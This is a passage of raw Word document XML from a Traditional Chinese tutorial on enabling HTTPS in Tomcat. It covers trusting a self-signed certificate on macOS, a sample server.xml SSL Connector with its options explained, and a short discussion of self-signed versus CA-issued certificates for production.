                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A4BD2AF" w14:textId="5358B008" w:rsidR="007309CF" w:rsidRDefault="007309CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C66048B" w14:textId="77777777" w:rsidR="007309CF" w:rsidRPr="007309CF" w:rsidRDefault="007309CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C23EAA" w14:textId="3557ABFB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這個指令是在MacOS系統中使用的指令行指令，它的作用是將一個證書文件（</w:t>
      </w:r>
      <w:r w:rsidR="004D01E5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web_cert</w:t>
      </w:r>
      <w:r w:rsidR="004D01E5" w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>.crt</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>）添加到系統信令的根證書列表中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EAF9F8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具體地，它執行了以下操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F845C62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580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使用 "sudo" 命令以管理員身份執行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D90BC5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調用“security”命令，這是MacOS系統中用於管理安全和證書的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A55B2F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執行 "add-trusted-cert" 子命令，它用於向系統信令的根證書列表表中添加證書</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA7F303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 "-d" 表示使用默認的信任等級</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7822AB3A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 "-r trustRoot" 表示標准證書的trustRoot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650FDAE9" w14:textId="77777777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 "-k /Library/Keychains/System.keychain" 表示把證書添加到系統的默認密碼鏈接，也就是System.keychain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4E0CD0" w14:textId="70090D4E" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F3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580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  <w:color w:val="374151"/>
        </w:rPr>
        <w:t>參數 "</w:t>
      </w:r>
      <w:r w:rsidR="00BB6747">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web_cert</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>.crt" 表示要添加的證書文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E5E2E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lastRenderedPageBreak/>
        <w:t>這樣的操作可以使系統充分信任指定的證明書，從而保護證明網站或應用程序的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7FE3A6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4F19BF7D" w14:textId="77777777" w:rsidR="004D01E5" w:rsidRPr="004D01E5" w:rsidRDefault="004D01E5" w:rsidP="004D01E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D01E5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>其他</w:t>
      </w:r>
      <w:r w:rsidRPr="004D01E5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidRPr="004D01E5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>請參考</w:t>
      </w:r>
      <w:r w:rsidRPr="004D01E5">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D4872" w14:textId="29D410D4" w:rsidR="0098676C" w:rsidRPr="004D01E5" w:rsidRDefault="0038465F" w:rsidP="004D01E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidR="004D01E5" w:rsidRPr="004D01E5">
          <w:rPr>
            <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://blog.miniasp.com/post/2019/02/25/Creating-Self-signed-Certificate-using-OpenSSL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A787EE2" w14:textId="1A00D5AA" w:rsidR="00440506" w:rsidRPr="00440506" w:rsidRDefault="007247F3" w:rsidP="00EF285F">
      <w:pPr>
        <w:pStyle w:val="3"/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/>
        </w:rPr>
        <w:t>十、</w:t>
      </w:r>
      <w:r w:rsidR="00440506">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伺服器加入</w:t>
      </w:r>
      <w:r w:rsidR="00440506">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00440506">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CA </w:t>
      </w:r>
      <w:r w:rsidR="00E65929">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>憑證</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDE17FE" w14:textId="0281D943" w:rsidR="0098676C" w:rsidRPr="00E65929" w:rsidRDefault="007247F3" w:rsidP="00440506">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E65929">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>修改 server.xml (透過CA)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53AE50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6840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&lt;Connector </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73EB5E8D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SSLEnabled="true" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27973871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SSLEngine="on" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5D0C35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clientAuth="false" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FAA4031" w14:textId="3D186228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</w:pPr>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FF0000"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  <w:t>keystoreFile="</w:t>
            </w:r>
            <w:r w:rsidR="00600950" w:rsidRPr="00DC0584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val="en-US"/>
              </w:rPr>
              <w:t>C:/ 完整路徑</w:t>
            </w:r>
            <w:r w:rsidR="00600950" w:rsidRPr="00DC0584"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  <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584"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  <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00E804E1"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  <w:t>web_</w:t>
            </w:r>
            <w:r w:rsidR="00600950" w:rsidRPr="00DC0584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val="en-US"/>
              </w:rPr>
              <w:t>ca</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">.pfx" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216D8A38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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    keystorePass="123456" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="025C47D6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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC0584">
              <w:rPr>
                <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    keystoreType="pkcs12" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="293C86C7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maxThreads="200" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="120B5651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port="8443" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57FB199F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</w:rPr>
              <w:t xml:space="preserve">protocol="org.apache.coyote.http11.Http11NioProtocol" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5712CB71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</w:rPr>
              <w:t xml:space="preserve">    scheme="https" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0713905C" w14:textId="77777777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</w:rPr>
              <w:t xml:space="preserve">    secure="true"/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1495D8E4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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="615469F7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7E720C88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  <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
        <w:t>clientAuth</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是一個 Tomcat 配置選項，它指定是否需要客戶端證書驗證。設置 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
        <w:t>clientAuth="false"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F7F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表示不需要客戶端證書驗證，也就是沒有身份驗證需求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7857BB82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58C15F0A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/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是 Tomcat 配置選項，它指定使用的 HTTP 協定。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>org.apache.coyote.http11.Http11NioProtocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是一種特定的 Tomcat 協定，它使用 NIO (Non-Blocking Input/Output) 架構，以支援高效的多用戶處理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D67E35E" w14:textId="77777777" w:rsidR="0098676C" w:rsidRPr="00DC0584" w:rsidRDefault="007247F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rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="374151"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0584">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="Arial Unicode MS"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>這種協定的用途是為 Tomcat 提供一種方法來處理 HTTP 請求，它是對傳統的同步阻塞 I/O 的改進，可以更有效地處理大量的並行連接，適用於高流量的 Web 應用程式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A53BB" w14:textId="5CF3BE2F" w:rsidR="0098676C" w:rsidRDefault="0098676C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F9D807" w14:textId="77777777" w:rsidR="00104E89" w:rsidRDefault="00104E89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF23EC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF23EC"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD3F435" w14:textId="7DB6B2E4" w:rsidR="00DA203A" w:rsidRPr="00DA203A" w:rsidRDefault="00DA203A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="FF23EC"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA203A">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:color w:val="FF23EC"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>測試：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7138D9BA" w14:textId="68ECCB67" w:rsidR="00DA203A" w:rsidRDefault="00DA203A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/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52AA83E3" wp14:editId="59028A63">
            <wp:extent cx="2796868" cy="1998988"/>
            <wp:effectExtent l="12700" t="12700" r="10160" b="7620"/>
            <wp:docPr id="5" name="圖片 5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字型, 數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37" cy="2004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42E18" w14:textId="55A93C56" w:rsidR="006216A0" w:rsidRDefault="006216A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440823B9" w14:textId="77777777" w:rsidR="00BC3130" w:rsidRDefault="00BC3130">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BD1FE8" w14:textId="35ACDF88" w:rsidR="006216A0" w:rsidRPr="006216A0" w:rsidRDefault="00907FC2" w:rsidP="006216A0">
      <w:pPr>
        <w:pStyle w:val="3"/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lastRenderedPageBreak/>
        <w:t>十一、</w:t>
      </w:r>
      <w:r w:rsidR="006216A0" w:rsidRPr="006216A0">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>安全嗎？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD9875" w14:textId="77777777" w:rsidR="006216A0" w:rsidRPr="006216A0" w:rsidRDefault="006216A0" w:rsidP="006216A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006216A0">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>這取決於幾個因素：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0E21C" w14:textId="77777777" w:rsidR="006216A0" w:rsidRPr="006511D6" w:rsidRDefault="006216A0" w:rsidP="007B2A97">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B2A97">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>憑證來源：</w:t>
      </w:r>
      <w:r w:rsidRPr="007B2A97">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>如果您自己生成了此憑證（即自簽名憑證），那麼它對外部用戶可能不被視為安全的，因為它沒有由受信任的憑證頒發機構 (CA) 簽名。</w:t>
      </w:r>
      <w:r w:rsidRPr="006511D6">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>但對於開發和測試目的，自簽名憑證是可以的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F2017" w14:textId="77777777" w:rsidR="006216A0" w:rsidRPr="007B2A97" w:rsidRDefault="006216A0" w:rsidP="007B2A97">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D16C7">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>憑證的私鑰安全性：</w:t>
      </w:r>
      <w:r w:rsidRPr="007B2A97">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>憑證的私鑰應該嚴格保密。如果私鑰被泄露，任何人都可以冒充您的服務。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1598F4" w14:textId="0ECCD599" w:rsidR="007B2A97" w:rsidRPr="007B2A97" w:rsidRDefault="006216A0" w:rsidP="007B2A97">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D16C7">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>憑證的有效期：</w:t>
      </w:r>
      <w:r w:rsidRPr="007B2A97">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>憑證是有時限的，並在某一日期後過期。過期的憑證應該更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7935997F" w14:textId="77777777" w:rsidR="007B2A97" w:rsidRDefault="007B2A97" w:rsidP="006216A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587CA57A" w14:textId="53F85537" w:rsidR="006216A0" w:rsidRPr="00DA203A" w:rsidRDefault="007B2A97" w:rsidP="006216A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B2A97">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>要注意，只要憑證是受信任的，並且私鑰未被泄露，HTTPS 通信本身是安全的，因為它使用加密來保護數據。</w:t>
      </w:r>
      <w:r w:rsidR="006216A0" w:rsidRPr="006216A0">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>總之，</w:t>
      </w:r>
      <w:r w:rsidR="006216A0" w:rsidRPr="00275399">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>對於</w:t>
      </w:r>
      <w:r w:rsidR="00F90C67" w:rsidRPr="00275399">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>正式</w:t>
      </w:r>
      <w:r w:rsidR="006216A0" w:rsidRPr="00275399">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>環境，您應該從受信任的憑證頒發機構購買或獲取憑證，並確保密鑰的安全。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E285E50" w14:textId="77777777" w:rsidR="001B061D" w:rsidRDefault="001B061D" w:rsidP="001B061D"/>
    <w:p w14:paraId="40B68205" w14:textId="256F14D7" w:rsidR="00F0328B" w:rsidRPr="00D57C6A" w:rsidRDefault="001B061D" w:rsidP="00F0328B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D57C6A">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>憑證頒發機構 (CA)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0354CC" w14:textId="0875CB13" w:rsidR="001B061D" w:rsidRDefault="001B061D" w:rsidP="00F0328B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B061D">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>TWCA (Taiwan Certification Authority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC5246" w14:textId="31DD91DD" w:rsidR="006A1DF0" w:rsidRDefault="0038465F" w:rsidP="00F0328B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="006A1DF0" w:rsidRPr="006A1DF0">
          <w:rPr>
            <w:rStyle w:val="aff2"/>
            <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          </w:rPr>
          <w:t>https://www.twca.com.tw/sslService</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C4E072A" w14:textId="77777777" w:rsidR="006A1DF0" w:rsidRDefault="006A1DF0" w:rsidP="00D160A8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
